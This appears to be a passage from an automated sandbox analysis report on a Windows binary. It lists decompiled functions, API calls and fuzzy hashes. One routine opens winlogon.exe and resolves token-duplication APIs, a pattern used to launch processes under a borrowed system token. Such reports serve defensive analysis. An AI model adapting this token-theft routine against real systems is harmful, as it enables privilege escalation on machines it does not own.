                                                                                                                            0x00401e67
                                                                                                                            0x00401ef9
                                                                                                                            0x00401e6d
                                                                                                                            0x00401e70
                                                                                                                            0x00401e76
                                                                                                                            0x00401e79
                                                                                                                            0x00401e7e
                                                                                                                            0x00401e83
                                                                                                                            0x00401e92
                                                                                                                            0x00401e85
                                                                                                                            0x00401e8e
                                                                                                                            0x00401e8e
                                                                                                                            0x00401e96
                                                                                                                            0x00401ee6
                                                                                                                            0x00401e98
                                                                                                                            0x00401e9b
                                                                                                                            0x00401e9e
                                                                                                                            0x00401ea3
                                                                                                                            0x00401ea8
                                                                                                                            0x00401ebb
                                                                                                                            0x00401eaa
                                                                                                                            0x00401eb7
                                                                                                                            0x00401eb7
                                                                                                                            0x00401ebf
                                                                                                                            0x00401ed3
                                                                                                                            0x00401ec1
                                                                                                                            0x00401ec7
                                                                                                                            0x00401ec9
                                                                                                                            0x00401ec9
                                                                                                                            0x00401ed8
                                                                                                                            0x00401ed8
                                                                                                                            0x00401eeb
                                                                                                                            0x00401eeb
                                                                                                                            0x00401f01

                                                                                                                            APIs
                                                                                                                            • OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,winlogon.exe,?,00000000,winlogon.exe,00000000), ref: 00401E5C
                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EF3
                                                                                                                              • Part of subcall function 0040289F: LoadLibraryW.KERNEL32(advapi32.dll,?,00402271,?,?,00000000), ref: 004028AB
                                                                                                                              • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithLogonW), ref: 004028C0
                                                                                                                              • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,CreateProcessWithTokenW), ref: 004028CD
                                                                                                                              • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 004028D9
                                                                                                                              • Part of subcall function 0040289F: GetProcAddress.KERNEL32(00000000,DuplicateTokenEx), ref: 004028E6
                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401ECD
                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401ED8
                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?,?), ref: 00401EE0
                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00401FAE,0040218D,?), ref: 00401EEB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000024.00000002.432049578.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000024.00000002.432029291.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432184416.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432232004.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432293013.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressProc$ErrorLast$CloseHandle$LibraryLoadOpenProcess
                                                                                                                            • String ID: winlogon.exe
                                                                                                                            • API String ID: 1315556178-961692650
                                                                                                                            • Opcode ID: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
                                                                                                                            • Instruction ID: 37dd24dd8946aa7f8aa4240fd04c0d288f38f50501b3184a6b0aa07a3247aa85
                                                                                                                            • Opcode Fuzzy Hash: e4a5705fcdc82a33d7d09986f8f31284f2fb5d3fd113eab1cd0e790a40dcb407
                                                                                                                            • Instruction Fuzzy Hash: FB212932900114EFDB10AFA5CDC8AAE7BB5EB04350F14893AFE06F72A0D7749D41DA94
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040605E, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 42%
                                                                                                                            			E0040605E(void* __ecx, void* __eflags, intOrPtr _a4, struct HMENU__* _a8, intOrPtr _a12, int _a16, intOrPtr _a20, wchar_t* _a36, intOrPtr _a40, long _a48, void _a50) {
				struct tagMENUITEMINFOW _v0;
				int _t24;
				wchar_t* _t30;
				intOrPtr _t32;
				int _t34;
				int _t42;
				signed int _t47;
				signed int _t48;

				_t36 = __ecx;
				_t48 = _t47 & 0xfffffff8;
				E0040B550(0x203c, __ecx);
				_t24 = GetMenuItemCount(_a8);
				_t34 = _t24;
				_t42 = 0;
				if(_t34 <= 0) {
					L13:
					return _t24;
				} else {
					goto L1;
				}
				do {
					L1:
					memset( &_a50, 0, 0x2000);
					_t48 = _t48 + 0xc;
					_a36 =  &_a48;
					_v0.cbSize = 0x30;
					_a4 = 0x36;
					_a40 = 0x1000;
					_a16 = 0;
					_a48 = 0;
					_t24 = GetMenuItemInfoW(_a8, _t42, 1,  &_v0);
					if(_t24 == 0) {
						goto L12;
					}
					if(_a48 == 0) {
						L10:
						_t56 = _a20;
						if(_a20 != 0) {
							_push(0);
							_push(_a20);
							_push(_a4);
							_t24 = E0040605E(_t36, _t56);
							_t48 = _t48 + 0xc;
						}
						goto L12;
					}
					_t30 = wcschr( &_a48, 9);
					if(_t30 != 0) {
						 *_t30 = 0;
					}
					_t31 = _a16;
					if(_a20 != 0) {
						if(_a12 == 0) {
							 *0x40fe20 =  *0x40fe20 + 1;
							_t32 =  *0x40fe20; // 0x0
							_t31 = _t32 + 0x11558;
							__eflags = _t32 + 0x11558;
						} else {
							_t17 = _t42 + 0x11171; // 0x11171
							_t31 = _t17;
						}
					}
					_t24 = E00406025(_t31,  &_a48);
					_pop(_t36);
					goto L10;
					L12:
					_t42 = _t42 + 1;
				} while (_t42 < _t34);
				goto L13;
			}











                                                                                                                            0x0040605e
                                                                                                                            0x00406061
                                                                                                                            0x00406069
                                                                                                                            0x00406074
                                                                                                                            0x0040607a
                                                                                                                            0x0040607e
                                                                                                                            0x00406082
                                                                                                                            0x00406148
                                                                                                                            0x0040614e
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00406088
                                                                                                                            0x00406088
                                                                                                                            0x00406093
                                                                                                                            0x00406098
                                                                                                                            0x0040609f
                                                                                                                            0x004060ae
                                                                                                                            0x004060b6
                                                                                                                            0x004060be
                                                                                                                            0x004060c6
                                                                                                                            0x004060ca
                                                                                                                            0x004060cf
                                                                                                                            0x004060d7
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004060de
                                                                                                                            0x00406129
                                                                                                                            0x00406129
                                                                                                                            0x0040612d
                                                                                                                            0x0040612f
                                                                                                                            0x00406130
                                                                                                                            0x00406134
                                                                                                                            0x00406137
                                                                                                                            0x0040613c
                                                                                                                            0x0040613c
                                                                                                                            0x00000000
                                                                                                                            0x0040612d
                                                                                                                            0x004060e7
                                                                                                                            0x004060f0
                                                                                                                            0x004060f2
                                                                                                                            0x004060f2
                                                                                                                            0x004060f9
                                                                                                                            0x004060fd
                                                                                                                            0x00406102
                                                                                                                            0x0040610c
                                                                                                                            0x00406112
                                                                                                                            0x00406117
                                                                                                                            0x00406117
                                                                                                                            0x00406104
                                                                                                                            0x00406104
                                                                                                                            0x00406104
                                                                                                                            0x00406104
                                                                                                                            0x00406102
                                                                                                                            0x00406122
                                                                                                                            0x00406128
                                                                                                                            0x00000000
                                                                                                                            0x0040613f
                                                                                                                            0x0040613f
                                                                                                                            0x00406140
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000024.00000002.432049578.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000024.00000002.432029291.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432184416.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432232004.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432293013.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                            • String ID: 0$6
                                                                                                                            • API String ID: 2029023288-3849865405
                                                                                                                            • Opcode ID: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
                                                                                                                            • Instruction ID: 45aed224341beddc1f9b42311d86e3f1d1daa84a2c492251b1da63e2972132ba
                                                                                                                            • Opcode Fuzzy Hash: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
                                                                                                                            • Instruction Fuzzy Hash: 7521F132504304ABC720DF45D84599FB7E8FB85754F000A3FF685A62D1E776C950CB8A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00409A46, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 31libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00409A46(struct HINSTANCE__** __eax, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				struct HINSTANCE__* _t11;
				struct HINSTANCE__** _t14;
				struct HINSTANCE__* _t15;

				_t14 = __eax;
				if( *((intOrPtr*)(__eax)) == 0) {
					_t11 = E00405436(L"winsta.dll");
					 *_t14 = _t11;
					if(_t11 != 0) {
						_t14[1] = GetProcAddress(_t11, "WinStationGetProcessSid");
					}
				}
				_t15 = _t14[1];
				if(_t15 == 0) {
					return 0;
				} else {
					return _t15->i(0, _a4, _a16, _a20, _a8, _a12);
				}
			}






                                                                                                                            0x00409a4a
                                                                                                                            0x00409a4f
                                                                                                                            0x00409a56
                                                                                                                            0x00409a5e
                                                                                                                            0x00409a60
                                                                                                                            0x00409a6e
                                                                                                                            0x00409a6e
                                                                                                                            0x00409a60
                                                                                                                            0x00409a71
                                                                                                                            0x00409a76
                                                                                                                            0x00000000
                                                                                                                            0x00409a78
                                                                                                                            0x00000000
                                                                                                                            0x00409a89

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                              • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                              • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                              • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                            • GetProcAddress.KERNEL32(00000000,WinStationGetProcessSid), ref: 00409A68
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000024.00000002.432049578.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000024.00000002.432029291.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432184416.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432232004.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432293013.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoad$AddressProcmemsetwcscat
                                                                                                                            • String ID: WinStationGetProcessSid$winsta.dll$Y@
                                                                                                                            • API String ID: 946536540-379566740
                                                                                                                            • Opcode ID: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
                                                                                                                            • Instruction ID: f8fd4ca1437852706c932511ef9fc121d1f4ef25cad53c4396aefa54a2cc69ea
                                                                                                                            • Opcode Fuzzy Hash: 1b7ebfe453553e3f98933d91fdad94fbea9a23791565fec376d5a3071c2edda0
                                                                                                                            • Instruction Fuzzy Hash: 4AF08236644219AFCF219FE09C01B977BD5AB08710F00443AF945B21D1D67588509F98
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00404A44, Relevance: 6.0, APIs: 4, Instructions: 47windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00404A44(void* __ecx, struct HWND__* _a4, int _a8, intOrPtr _a12) {
				long _v8;
				long _v12;
				long _t13;
				void* _t14;
				struct HWND__* _t24;

				_t24 = GetDlgItem(_a4, _a8);
				_t13 = SendMessageW(_t24, 0x146, 0, 0);
				_v12 = _t13;
				_v8 = 0;
				if(_t13 <= 0) {
					L3:
					_t14 = 0;
				} else {
					while(SendMessageW(_t24, 0x150, _v8, 0) != _a12) {
						_v8 = _v8 + 1;
						if(_v8 < _v12) {
							continue;
						} else {
							goto L3;
						}
						goto L4;
					}
					SendMessageW(_t24, 0x14e, _v8, 0);
					_t14 = 1;
				}
				L4:
				return _t14;
			}








                                                                                                                            0x00404a62
                                                                                                                            0x00404a6a
                                                                                                                            0x00404a6e
                                                                                                                            0x00404a71
                                                                                                                            0x00404a74
                                                                                                                            0x00404a92
                                                                                                                            0x00404a92
                                                                                                                            0x00404a76
                                                                                                                            0x00404a76
                                                                                                                            0x00404a87
                                                                                                                            0x00404a90
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00404a90
                                                                                                                            0x00404aa3
                                                                                                                            0x00404aa7
                                                                                                                            0x00404aa7
                                                                                                                            0x00404a94
                                                                                                                            0x00404a98

                                                                                                                            APIs
                                                                                                                            • GetDlgItem.USER32 ref: 00404A52
                                                                                                                            • SendMessageW.USER32(00000000,00000146,00000000,00000000), ref: 00404A6A
                                                                                                                            • SendMessageW.USER32(00000000,00000150,00000000,00000000), ref: 00404A80
                                                                                                                            • SendMessageW.USER32(00000000,0000014E,00000000,00000000), ref: 00404AA3
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000024.00000002.432049578.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000024.00000002.432029291.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432184416.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432232004.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432293013.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$Item
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3888421826-0
                                                                                                                            • Opcode ID: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
                                                                                                                            • Instruction ID: a803108f18d13bdb161ef9cfeaea96f484be20865a03d7d0c1e8cd60aac843f5
                                                                                                                            • Opcode Fuzzy Hash: 8e654b4fb51c2e6e0140a28d1ff35be7b55d0d95af2e0242a2f6fa2b8df4bf67
                                                                                                                            • Instruction Fuzzy Hash: 02F01DB1A4010CFEEB018FD59DC1DAF7BBDEB89755F104479F604E6150D2709E41AB64
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040AC52, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E0040AC52() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;

				if( *0x4101c4 == 0) {
					_t1 = E00405436(L"shell32.dll");
					 *0x4101c4 = _t1;
					if(_t1 != 0) {
						_t2 = GetProcAddress(_t1, "SHGetSpecialFolderPathW");
						 *0x4101c0 = _t2;
						return _t2;
					}
				}
				return _t1;
			}





                                                                                                                            0x0040ac59
                                                                                                                            0x0040ac60
                                                                                                                            0x0040ac68
                                                                                                                            0x0040ac6d
                                                                                                                            0x0040ac75
                                                                                                                            0x0040ac7b
                                                                                                                            0x00000000
                                                                                                                            0x0040ac7b
                                                                                                                            0x0040ac6d
                                                                                                                            0x0040ac80

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00405436: memset.MSVCRT ref: 00405456
                                                                                                                              • Part of subcall function 00405436: wcscat.MSVCRT ref: 00405478
                                                                                                                              • Part of subcall function 00405436: LoadLibraryW.KERNELBASE(00000000), ref: 00405489
                                                                                                                              • Part of subcall function 00405436: LoadLibraryW.KERNEL32(?), ref: 00405492
                                                                                                                            • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0040AC75
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000024.00000002.432049578.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000024.00000002.432029291.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432184416.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432232004.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                            • Associated: 00000024.00000002.432293013.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                            Similarity
                                                                                                                            • API ID: LibraryLoad$AddressProcmemsetwcscat
                                                                                                                            • String ID: SHGetSpecialFolderPathW$shell32.dll
                                                                                                                            • API String ID: 946536540-880857682
                                                                                                                            • Opcode ID: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
                                                                                                                            • Instruction ID: 297d67d15b42b64e279660486abf15c243c4c6a8dcafd005a32ae5f28444c9d4
                                                                                                                            • Opcode Fuzzy Hash: c6b2f9cbd74a5c44be84662768ba9687afe1719f9bd5d931826811f56c49482b
                                                                                                                            • Instruction Fuzzy Hash: 9AD0C9B0D8A301ABE7106BB0AF05B523AA4B704301F12417BF800B12E0DBBE90888A1E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%